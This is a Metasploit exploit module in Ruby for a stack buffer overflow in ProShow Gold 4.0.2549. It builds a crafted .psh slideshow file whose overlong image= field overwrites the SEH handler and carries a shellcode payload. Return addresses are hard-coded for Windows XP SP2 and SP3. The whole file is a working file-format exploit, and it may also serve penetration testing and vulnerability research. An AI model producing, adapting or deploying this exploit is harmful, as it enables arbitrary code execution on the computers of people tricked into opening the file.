require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh
        
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ProShow Gold PSH Buffer Overflow.',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in ProShow Gold 4.0.2549
					resulting from unchecked bounds on the cell[index].images[index].image= key
					value pair.
										
					Note:  This bug is screwy SEH-offset-wise.
			},
			'License'        => MSF_LICENSE,
			'Author'         => 'SaintPatrick <saintpatrick@l1pht.com>',
			'Version'        => '$Revision:$',
			'References'     =>
				[
					['OSVDB','57226'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'seh',
				},					
			'Payload'        =>
				{
					'Space'    => 1000,
					'BadChars' => "\x00\x0D\x0A\x5C",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        => 
				[
					[ 'Windows XP SP2', { 'Ret' => 0x032311CD }], 
					[ 'Windows XP SP3', { 'Ret' => 0x032C11CD }], 
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Aug 20 2009',
			'DefaultTarget'  => 0))

			register_options(
				[
					OptString.new('FILENAME', [ false, 'The file name.',  'slideshow.psh']),
					OptString.new('OUTPUTPATH', [ false, 'The location of the file.',  './data/exploits/']),
				], self.class)

	end

	def exploit
		# Header stuff.
		psh = "Photodex(R) ProShow(TM) Show File Version=0\r\n"
		psh << "proshowVersion=2549\r\n"
		psh << 'title='+rand_text_alpha(10)+"\r\n"
		psh << 'fileName=My Computer/C:/Documents and Settings/'+ rand_text_alpha(7) + '/Desktop/' + rand_text_alpha(10) + ".psh\r\n"
		psh << "description=\"\"\r\n"
		psh << "makeFileLocalFolder=C:\\Documents and Settings\\"+rand_text_alpha(7)+"\\My Documents\r\n"
		psh << "cells=2\r\n"
		psh << "cell[0].imageEnable=1\r\n"
		psh << "cell[0].nrOfImages=1\r\n"
		
		# Trigger + Payload
		psh << "cell[0].images[0].image=" + rand_text_alpha_upper(4032) 
		
		# SEH Frame offset if loaded by command line in SP2
		buf1 = generate_seh_payload(target.ret)
		psh << buf1
		psh << rand_text_alpha(2376-buf1.length)
		
		# SEH Frame offset if loaded through file open icon both SP2/SP3
		buf2 = generate_seh_payload(target.ret)
		psh << buf2
		print_status("Creating '#{datastore['FILENAME']}' file ...")

		file_create(psh)
	end

end